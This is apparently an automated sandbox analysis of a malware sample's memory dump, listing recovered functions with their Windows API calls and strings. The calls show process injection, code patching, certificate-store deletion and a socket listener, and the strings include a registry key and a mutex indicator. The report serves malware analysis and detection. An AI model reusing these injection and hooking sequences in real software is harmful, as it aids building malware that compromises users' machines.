Part of subcall function 00C52AB4: memset.MSVCRT ref: 00C52AC9
Part of subcall function 00C52AB4: getsockname.WS2_32(?,00C2C22C,?), ref: 00C52ADC

Part of subcall function 00C5306E: memcmp.MSVCRT ref: 00C53090

Part of subcall function 00C46C9A: memcmp.MSVCRT ref: 00C46D07
Part of subcall function 00C46C9A: memcpy.MSVCRT ref: 00C46E14
Part of subcall function 00C46C9A: memcmp.MSVCRT ref: 00C46F11
Part of subcall function 00C46C9A: memset.MSVCRT ref: 00C46F76
Part of subcall function 00C46C9A: memcpy.MSVCRT ref: 00C46F87

Strings

GET , xrefs: 00C32032
POST , xrefs: 00C3204A

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C365F3, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 115

APIs

Part of subcall function 00C35D25: memset.MSVCRT ref: 00C35D35

lstrlenA.KERNEL32(?,?,?), ref: 00C366BC
lstrlenA.KERNEL32(?), ref: 00C366CF

Part of subcall function 00C4CB99: memcpy.MSVCRT ref: 00C4CBB0
Part of subcall function 00C4CB99: CharLowerA.USER32 ref: 00C4CC7B
Part of subcall function 00C4CB99: CharLowerA.USER32(?), ref: 00C4CC8B
Part of subcall function 00C4CB99: memcpy.MSVCRT ref: 00C4CD50

Part of subcall function 00C36AE4: memcpy.MSVCRT ref: 00C36AF7

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Strings

?*, xrefs: 00C366B1
:, xrefs: 00C3670A
:, xrefs: 00C36731

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3D9E7, Relevance: 7.6, APIs: 5, Instructions: 101

APIs

Part of subcall function 00C35A4F: GetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A51
Part of subcall function 00C35A4F: TlsGetValue.KERNEL32(?,?,00C2B9B4), ref: 00C35A6E
Part of subcall function 00C35A4F: TlsSetValue.KERNEL32(00000001), ref: 00C35A80
Part of subcall function 00C35A4F: SetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A90

GetProcessId.KERNEL32(?), ref: 00C3DA83

Part of subcall function 00C4BE5A: CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4BEA0
Part of subcall function 00C4BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00C4BEAC
Part of subcall function 00C4BE5A: CloseHandle.KERNEL32 ref: 00C4BEBA

Part of subcall function 00C2FBD5: TlsGetValue.KERNEL32(?,?,00C3D975), ref: 00C2FBDE

Part of subcall function 00C44A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44A89
Part of subcall function 00C44A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44AC4
Part of subcall function 00C44A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B04
Part of subcall function 00C44A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B27
Part of subcall function 00C44A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C44B77

GetThreadContext.KERNEL32 ref: 00C3DAE5
SetThreadContext.KERNEL32(?,?), ref: 00C3DB24
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C3DB3B
CloseHandle.KERNEL32(?), ref: 00C3DB45

Part of subcall function 00C35AD5: GetLastError.KERNEL32(?,00C2BA1E), ref: 00C35AD6
Part of subcall function 00C35AD5: TlsSetValue.KERNEL32(00000000), ref: 00C35AE6
Part of subcall function 00C35AD5: SetLastError.KERNEL32(?,?,00C2BA1E), ref: 00C35AED

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351D69D, Relevance: 7.6, APIs: 5, Instructions: 98

APIs

Part of subcall function 0351EB3A: EnterCriticalSection.KERNEL32(?,?,?,0351E322,0000000D,?,00000000,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351EB64

DecodePointer.KERNEL32(0353EEC8,00000020,0351D804,?,00000001,00000000,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D), ref: 0351D6E7
DecodePointer.KERNEL32(?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000,?,?,?,0351EFA8), ref: 0351D6F8

Part of subcall function 0351E255: RtlEncodePointer.NTDLL(00000000,0351D714,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000), ref: 0351E257

DecodePointer.KERNEL32(?,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000,?,?,?), ref: 0351D71E
DecodePointer.KERNEL32(?,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000,?,?,?), ref: 0351D731
DecodePointer.KERNEL32(?,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000,?,?,?), ref: 0351D73B

Part of subcall function 0351EA61: LeaveCriticalSection.KERNEL32(?,0351EB38,0000000A,0351EB28,0353EF58,0000000C,0351EB55,?,?,?,0351E322,0000000D,?,00000000), ref: 0351EA70

Part of subcall function 0351D585: ExitProcess.KERNEL32(?,?,03520D5B,000000FF,0000001E,00000001,00000000,00000000,?,0351FEF1,?,00000001,?,?,0351EAC5,00000018), ref: 0351D596

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 0351DF2F, Relevance: 7.6, APIs: 5, Instructions: 71

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0351DF37
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0351DF75
FreeEnvironmentStringsW.KERNEL32 ref: 0351DFB7

Part of subcall function 0351FEE0: Sleep.KERNEL32(00000000), ref: 0351FF01

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0351DF98
FreeEnvironmentStringsW.KERNEL32 ref: 0351DFAB

Part of subcall function 0351FE47: HeapFree.KERNEL32(00000000,00000000,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE5D
Part of subcall function 0351FE47: GetLastError.KERNEL32(?,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE6F

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C2C77A, Relevance: 7.6, APIs: 6, Instructions: 61

APIs

Part of subcall function 00C2F1A8: EnterCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1B8
Part of subcall function 00C2F1A8: LeaveCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1E2

memset.MSVCRT ref: 00C2C7BC
memset.MSVCRT ref: 00C2C7C8
memset.MSVCRT ref: 00C2C7D4
InitializeCriticalSection.KERNEL32 ref: 00C2C7EC
InitializeCriticalSection.KERNEL32 ref: 00C2C807
InitializeCriticalSection.KERNEL32 ref: 00C2C844

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351E8DB, Relevance: 7.6, APIs: 5, Instructions: 54

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0351E912
GetCurrentProcessId.KERNEL32 ref: 0351E91E
GetCurrentThreadId.KERNEL32 ref: 0351E926
GetTickCount.KERNEL32 ref: 0351E92E
QueryPerformanceCounter.KERNEL32(?), ref: 0351E93A

Memory Dump Source

Source File: 00000003.00000000.788052119.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000003.00000000.788035762.03500000.00000002.sdmp
Associated: 00000003.00000000.788127013.03522000.00000002.sdmp
Associated: 00000003.00000000.788193861.03540000.00000008.sdmp
Associated: 00000003.00000000.788255967.0355C000.00000002.sdmp

Function 00C4071B, Relevance: 7.5, APIs: 5, Instructions: 43

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00C40734
CertDuplicateCertificateContext.CRYPT32(?,?,00000000), ref: 00C40745
CertDeleteCertificateFromStore.CRYPT32(?,?,?,00000000), ref: 00C40750
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00C40758
CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00C40766

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2DB89, Relevance: 7.5, APIs: 5, Instructions: 28

APIs

SetEvent.KERNEL32(?), ref: 00C2DB95
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C2DBA6
CloseHandle.KERNEL32(?), ref: 00C2DBAF
CloseHandle.KERNEL32(?), ref: 00C2DBBE

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

DeleteCriticalSection.KERNEL32(00000000,?,00C2DB81,00000000), ref: 00C2DBD5

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C410E0, Relevance: 7.5, APIs: 4, Instructions: 113

APIs

Part of subcall function 00C40D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00C40D60

RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4113B
RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C411A5
RegFlushKey.ADVAPI32(00000000), ref: 00C411D3
RegCloseKey.ADVAPI32(00000000), ref: 00C411DA

Part of subcall function 00C41051: EnterCriticalSection.KERNEL32(Function_00043510,?,?,00000000,00C411FB,?,?,?,7C809C98,00000014,00000000), ref: 00C41067
Part of subcall function 00C41051: LeaveCriticalSection.KERNEL32(Function_00043510,?,?,00000000,00C411FB,?,?,?,7C809C98,00000014,00000000), ref: 00C4108F
Part of subcall function 00C41051: GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00C410AB
Part of subcall function 00C41051: GetProcAddress.KERNEL32 ref: 00C410B2
Part of subcall function 00C41051: RegDeleteKeyW.ADVAPI32(?,?), ref: 00C410D4

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Part of subcall function 00C40D19: RegFlushKey.ADVAPI32 ref: 00C40D29
Part of subcall function 00C40D19: RegCloseKey.ADVAPI32 ref: 00C40D31

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C39F57, Relevance: 7.4, APIs: 4, Instructions: 87

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00C2B41A,?), ref: 00C39F69

Part of subcall function 00C507B1: CoCreateInstance.OLE32(00C217F8,00000000,00004401,00C21858,?), ref: 00C507C6

#2.OLEAUT32(00C2B41A,00000000,?,?,?,00C2B41A,?), ref: 00C39F9D
#6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C2B41A,?), ref: 00C39FD2
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00C39FF2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4575A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 68

APIs

memset.MSVCRT ref: 00C45774

Part of subcall function 00C4BAD3: memcpy.MSVCRT ref: 00C4BAEE
Part of subcall function 00C4BAD3: StringFromGUID2.OLE32(?), ref: 00C4BB92

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C457BA

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Strings

Software\Microsoft\Yfosteyq, xrefs: 00C4576E 00C45773 00C457FB
Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 00C4577F

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C36E19, Relevance: 7.4, APIs: 4, Instructions: 57

APIs

memcpy.MSVCRT ref: 00C36E41
memcpy.MSVCRT ref: 00C36E5E
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36E74
WSASetLastError.WS2_32(0000274C), ref: 00C36E83

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C52BF3, Relevance: 7.4, APIs: 4, Instructions: 54

APIs

Part of subcall function 00C527C1: socket.WS2_32(?,?,00000006), ref: 00C527F5

bind.WS2_32(?,00C52CD1), ref: 00C52C3A
listen.WS2_32(?,00000014), ref: 00C52C4F
WSAGetLastError.WS2_32(00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C52C5D

Part of subcall function 00C52968: shutdown.WS2_32(?,00000002), ref: 00C52976
Part of subcall function 00C52968: closesocket.WS2_32(?), ref: 00C5297F
Part of subcall function 00C52968: WSACloseEvent.WS2_32(?), ref: 00C52992

WSASetLastError.WS2_32(?,?,00C52CD1,?,?,?,?,00000000), ref: 00C52C6D

Part of subcall function 00C52917: WSACreateEvent.WS2_32(00000000,?,00C52C15,?,00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C5292D
Part of subcall function 00C52917: WSAEventSelect.WS2_32(?,?,00C52CD1), ref: 00C52943
Part of subcall function 00C52917: WSACloseEvent.WS2_32(?), ref: 00C52957

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2CBBC, Relevance: 7.3, APIs: 4, Instructions: 139

APIs

Part of subcall function 00C2F1EF: memcmp.MSVCRT ref: 00C2F1FB

Part of subcall function 00C2F20B: memset.MSVCRT ref: 00C2F219
Part of subcall function 00C2F20B: memcpy.MSVCRT ref: 00C2F23A
Part of subcall function 00C2F20B: memcpy.MSVCRT ref: 00C2F260
Part of subcall function 00C2F20B: memcpy.MSVCRT ref: 00C2F284

TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00C2D203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00C2CC39

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2CCB3
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2CCD2

Part of subcall function 00C2F0E1: memcmp.MSVCRT ref: 00C2F0FD

LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000), ref: 00C2CD20

Part of subcall function 00C2EEE2: memcpy.MSVCRT ref: 00C2EFC1
Part of subcall function 00C2EEE2: memcpy.MSVCRT ref: 00C2EFE2

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3258C, Relevance: 7.3, APIs: 4, Instructions: 120

APIs

GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00C325BA
GetSystemTime.KERNEL32(?), ref: 00C3260D
CharLowerW.USER32(?), ref: 00C3265D
PathRenameExtensionW.SHLWAPI(?,?), ref: 00C3268D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C54D77, Relevance: 7.3, APIs: 4, Instructions: 111

APIs

Part of subcall function 00C54B12: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C54D87,?,00F41E90), ref: 00C54B22
Part of subcall function 00C54B12: LeaveCriticalSection.KERNEL32(00C63510,?,00F41E90), ref: 00C54B51

Part of subcall function 00C2D2F7: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00C2D315
Part of subcall function 00C2D2F7: VerQueryValueW.VERSION(?,?,?,?), ref: 00C2D382

GetCommandLineW.KERNEL32 ref: 00C54E01
CommandLineToArgvW.SHELL32 ref: 00C54E08
LocalFree.KERNEL32 ref: 00C54E48

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

GetModuleHandleW.KERNEL32(?), ref: 00C54E8A

Part of subcall function 00C5509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00C550E0

Part of subcall function 00C37D68: InitializeCriticalSection.KERNEL32 ref: 00C37D88

Part of subcall function 00C53C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
Part of subcall function 00C53C83: StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2C5FE, Relevance: 7.3, APIs: 4, Instructions: 104

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00C2D203,?,?,00000000,?,?,?,?,00000000), ref: 00C2C631

Part of subcall function 00C4D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C4D0B5

memcmp.MSVCRT ref: 00C2C67F

Part of subcall function 00C332C5: memcpy.MSVCRT ref: 00C332FB
Part of subcall function 00C332C5: memcpy.MSVCRT ref: 00C3330F
Part of subcall function 00C332C5: memset.MSVCRT ref: 00C3331D

SetEvent.KERNEL32 ref: 00C2C6C0

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2C6ED

Part of subcall function 00C51E96: EnterCriticalSection.KERNEL32(?,?,?,?,00C2CAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00C51E9C
Part of subcall function 00C51E96: memcmp.MSVCRT ref: 00C51EC8
Part of subcall function 00C51E96: memcpy.MSVCRT ref: 00C51F13
Part of subcall function 00C51E96: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00C51F1F

Part of subcall function 00C2CBBC: TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00C2D203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00C2CC39
Part of subcall function 00C2CBBC: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2CCB3
Part of subcall function 00C2CBBC: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2CCD2
Part of subcall function 00C2CBBC: LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000), ref: 00C2CD20

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4AF4A, Relevance: 7.3, APIs: 4, Instructions: 91

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00C5F128), ref: 00C4AF7C
DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00C4AF9C

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Part of subcall function 00C45C1C: memset.MSVCRT ref: 00C45C5F

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

Part of subcall function 00C2A150: memcpy.MSVCRT ref: 00C2A18C
Part of subcall function 00C2A150: memcpy.MSVCRT ref: 00C2A1A1
Part of subcall function 00C2A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00C2A1D3
Part of subcall function 00C2A150: memcpy.MSVCRT ref: 00C2A209
Part of subcall function 00C2A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00C2A239
Part of subcall function 00C2A150: memcpy.MSVCRT ref: 00C2A26F
Part of subcall function 00C2A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00C2A29F

memset.MSVCRT ref: 00C4B039
memcpy.MSVCRT ref: 00C4B04B

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C31905, Relevance: 7.2, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00F41E90,00000000,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31913

Part of subcall function 00C33764: GetModuleHandleW.KERNEL32(?), ref: 00C33780
Part of subcall function 00C33764: GetModuleHandleW.KERNEL32(?), ref: 00C337BB

GetFileVersionInfoSizeW.VERSION(00F41EF0,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31933
GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31953

Part of subcall function 00C54D77: GetCommandLineW.KERNEL32 ref: 00C54E01
Part of subcall function 00C54D77: CommandLineToArgvW.SHELL32 ref: 00C54E08
Part of subcall function 00C54D77: LocalFree.KERNEL32 ref: 00C54E48
Part of subcall function 00C54D77: GetModuleHandleW.KERNEL32(?), ref: 00C54E8A

Part of subcall function 00C2BBAD: VerQueryValueW.VERSION(?,00C275E4,?,?,00F41E90,?,00C31983,?,?,?,?,?,?,00C448EB), ref: 00C2BBCE
Part of subcall function 00C2BBAD: GetModuleHandleW.KERNEL32(?), ref: 00C2BC0F

Part of subcall function 00C3D8C0: GetModuleHandleW.KERNEL32(?), ref: 00C3D8DD

Part of subcall function 00C2E2C1: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C3198D,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C2E2D1
Part of subcall function 00C2E2C1: LeaveCriticalSection.KERNEL32(00C63510,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C2E2F9

Part of subcall function 00C2D987: InitializeCriticalSection.KERNEL32 ref: 00C2D9B5
Part of subcall function 00C2D987: GetModuleHandleW.KERNEL32(?), ref: 00C2DA1C

Part of subcall function 00C2E209: InitializeCriticalSection.KERNEL32 ref: 00C2E21E

Part of subcall function 00C3599B: EnterCriticalSection.KERNEL32(00C627DC,00000000,00C2D9CE,00F41E90,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C359A7
Part of subcall function 00C3599B: LeaveCriticalSection.KERNEL32(00C627DC,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C359B7

Part of subcall function 00C359C5: LeaveCriticalSection.KERNEL32(00C627DC,00C35A45,00000002,?,?,?,00C2DAA2,00000002,00000001,000000FF), ref: 00C359CF

Part of subcall function 00C359D6: LeaveCriticalSection.KERNEL32(00C627DC,?,00C2D9F7,00000009,00F41E90,?,?,?,00C31992,?,?,?,?,00C448EB), ref: 00C359E3

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

LeaveCriticalSection.KERNEL32(00F41E90,?,?,?,?,00C448EB,?,?,00000000), ref: 00C319D2

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C319E0, Relevance: 7.2, APIs: 4, Instructions: 70

APIs

EnterCriticalSection.KERNEL32(00F41E90), ref: 00C319EE

Part of subcall function 00C3353D: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C3376F,?,?,?,?,?,00C3191E,?,?,?,?,00C448EB), ref: 00C3354D
Part of subcall function 00C3353D: LeaveCriticalSection.KERNEL32(00C63510,?,?,?,?,?,00C3191E,?,?,?,?,00C448EB,?,?,00000000), ref: 00C33575

PathFindFileNameW.SHLWAPI(?), ref: 00C31A21

Part of subcall function 00C3357D: VirtualProtect.KERNEL32(?,00C337D4,00000080,?), ref: 00C335ED
Part of subcall function 00C3357D: GetCurrentThread.KERNEL32 ref: 00C336AC
Part of subcall function 00C3357D: GetThreadPriority.KERNEL32 ref: 00C336B5
Part of subcall function 00C3357D: SetThreadPriority.KERNEL32(?,0000000F), ref: 00C336C6
Part of subcall function 00C3357D: Sleep.KERNEL32(00000000), ref: 00C336CA
Part of subcall function 00C3357D: memcpy.MSVCRT ref: 00C336D9
Part of subcall function 00C3357D: FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00C336EA
Part of subcall function 00C3357D: SetThreadPriority.KERNEL32 ref: 00C336F2
Part of subcall function 00C3357D: GetTickCount.KERNEL32 ref: 00C3370D
Part of subcall function 00C3357D: GetTickCount.KERNEL32 ref: 00C3371A
Part of subcall function 00C3357D: Sleep.KERNEL32(00000000), ref: 00C33727
Part of subcall function 00C3357D: VirtualProtect.KERNEL32(?,00C337D4,00000000,?), ref: 00C33756

Part of subcall function 00C5509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00C550E0

LeaveCriticalSection.KERNEL32(00F41E90), ref: 00C31A9E

Part of subcall function 00C2BC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00C2BC6B

Part of subcall function 00C3BE32: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C3D8CC,?,00C31988,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C3BE42
Part of subcall function 00C3BE32: LeaveCriticalSection.KERNEL32(00C63510,?,00C31988,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C3BE71

PathFindFileNameW.SHLWAPI(?), ref: 00C31A64

Part of subcall function 00C53C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
Part of subcall function 00C53C83: StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Part of subcall function 00C2DA34: PathFindFileNameW.SHLWAPI(?), ref: 00C2DA53
Part of subcall function 00C2DA34: PathRemoveExtensionW.SHLWAPI(?), ref: 00C2DA7C

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C39346, Relevance: 7.2, APIs: 4, Instructions: 65

APIs

HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00C39375
GetLastError.KERNEL32(?,00000000,3D94878D,00000000,3D94878D,00C4D67C,?,?,?,?,?,00C27900,?,?,?), ref: 00C3937B

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

memcpy.MSVCRT ref: 00C393A6
HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00C393BF

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000003.00000002.822011887.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4D0DA, Relevance: 7.2, APIs: 4, Instructions: 61

APIs

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

QueryPerformanceCounter.KERNEL32(?), ref: 00C4D0F9
GetTickCount.KERNEL32 ref: 00C4D106

Part of subcall function 00C2F1A8: EnterCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1B8
Part of subcall function 00C2F1A8: LeaveCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1E2

